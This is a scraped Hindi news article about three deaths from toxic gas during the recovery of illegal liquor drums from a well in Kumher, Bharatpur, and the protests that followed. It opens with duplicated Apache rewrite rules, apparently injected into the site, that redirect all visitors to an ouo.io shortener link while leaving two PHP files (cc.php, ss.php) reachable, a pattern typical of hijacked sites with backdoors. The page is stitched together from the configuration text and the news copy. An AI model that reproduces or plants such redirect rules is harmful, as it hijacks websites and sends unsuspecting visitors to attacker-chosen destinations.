
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 343
Previous Nextकुम्हेर। भरतपुर के कुम्हेर कस्बे स्थित छापर मोहल्ला में कुएं में पड़े अवैध शराब के ड्रम को निकालते समय जहरीली गैस के कारण तीन लोगों की मौत के बाद जबर्दस्त हंगामा हो गया। भीड़ ने कुम्हेर कस्बा में विरोध प्रदर्शन कर शवों को चौराहे पर रख दिया। बाद में पुलिस-प्रशासन के अधिकारियों की मौजूदगी में मौके पर पहुंचे विधायक विश्वेन्द्र सिंह की समझाइश एवं कई घोषणाओं के बाद हालात सामान्य हुए। शव देर रात जिला आरबीएम अस्पताल में रखवाए गए। वहां कुम्हेर थाना पुलिस ने पोस्टमार्टम कराकर शव परिजनों को सौंप दिए। कुम्हेर कस्बे के छापर मोहल्ले में परिजनों ने दोषी आबकारी विभाग के पुलिसकर्मियों के खिलाफ मामला दर्ज कराने की मांग को लेकर शवों का दाह संस्कार करने से मना कर दिया। इससे प्रशासन में हड़कंप मच गया। बाद में तहसीलदार सोहनसिह नरूका और नगर पालिका अध्यक्ष महेन्द्रसिह जाटव ने समझाइश कर शाम को शवों का दाह संस्कार कराया।